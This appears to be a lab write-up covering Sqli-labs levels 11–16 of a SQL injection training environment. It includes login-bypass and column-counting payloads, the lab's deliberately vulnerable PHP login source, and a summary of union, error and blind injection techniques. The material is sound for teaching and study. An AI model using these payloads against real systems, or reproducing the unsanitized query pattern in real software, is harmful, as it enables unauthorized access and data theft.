[Sqli-labs] Breakthrough records 11~16
[Less-11] Post method injection based on '
1. Test process
- Try to use the universal password first
1' or 1=1#
As shown in the figure, successfully logged in!
-
Use burp to capture packets
Enter payload1 ' order by 5#View echo 
Using the dichotomy to finally measure the number of fields in the main query to be 2
//Query basic information of the database
Enter payload Echo information 
The rest of the steps are the same as before, including table name, field name, and field value. I won't repeat it here.
2. Source code analysis
<?php
//including the Mysql connect parameters.
include("../sql-connections/sql-connect.php");
error_reporting(0);
// take the variables
if(isset($_POST['uname']) && isset($_POST['passwd']))
{
$uname=$_POST['uname'];
$passwd=$_POST['passwd'];
//logging the connection parameters to a file for analysis.
$fp=fopen('result.txt','a');
fwrite($fp,'User Name:'.$uname);
fwrite($fp,'Password:'.$passwd."\n");
fclose($fp);
// connectivity //对传入的参数没有做任何的处理,直接拼接到sql语句中,明显存在sql注入漏洞
@$sql="SELECT username, password FROM users WHERE username='$uname' and password='$passwd' LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row)
{
//echo '<font color= "#0000ff">';
echo "<br>";
echo '<font color= "#FFFF00" font size = 4>';
//echo " You Have successfully logged in\n\n " ;
echo '<font size="3" color="#0000ff">';
echo "<br>";
echo 'Your Login name:'. $row['username'];
echo "<br>";
echo 'Your Password:' .$row['password'];
echo "<br>";
echo "</font>";
echo "<br>";
echo "<br>";
echo '<img src="../images/flag.jpg" />';
echo "</font>";
}
else
{
echo '<font color= "#0000ff" font size="3">';
//echo "Try again looser";
print_r(mysql_error());
echo "</br>";
echo "</br>";
echo "</br>";
echo '<img src="../images/slap.jpg" />';
echo "</font>";
}
}
?>
[Less-12] Post method injection based on ")
Except for the different closing methods, there is no difference from the previous level. Both the universal password and packet capture and replay can be successful.
[Less-13] Post method injection based on')
Except for the different closing methods, there is no difference from the previous level. Both the universal password and packet capture and replay can be successful.
[Less-14] Based on "post injection"
Except for the different closing methods, there is no difference from the previous level. Both the universal password and packet capture and replay can be successful.
| Test closure | Universal password login |
|---|---|
 |
 |
[Less-15] Post injection based on'(no error echo)
In addition to the different closing methods, this closing frequency shuts off the error echo information, which makes it a little difficult to judge the closing method, but it can be judged through repeated attempts. Both the universal password and the capture and replay can be successful.
[Less-16] Post method injection based on ") (no error echo)
In addition to the different closing methods, this closing frequency shuts off the error echo information, which makes it a little difficult to judge the closing method, but it can be judged through repeated attempts. Both the universal password and the capture and replay can be successful.
to sum up:
From less-11 to less-16, you can log in with a universal password, but the closing method is different [', "),'), "]
Get the administrator password:
There are specific echoes from less-11 to less-12, and you can directly inject the union (third party upper logic)
There are error reports from less-13 to less-16, and error injection can be used
There are only two ways to echo from less-15 to less-16, and blind injection can be used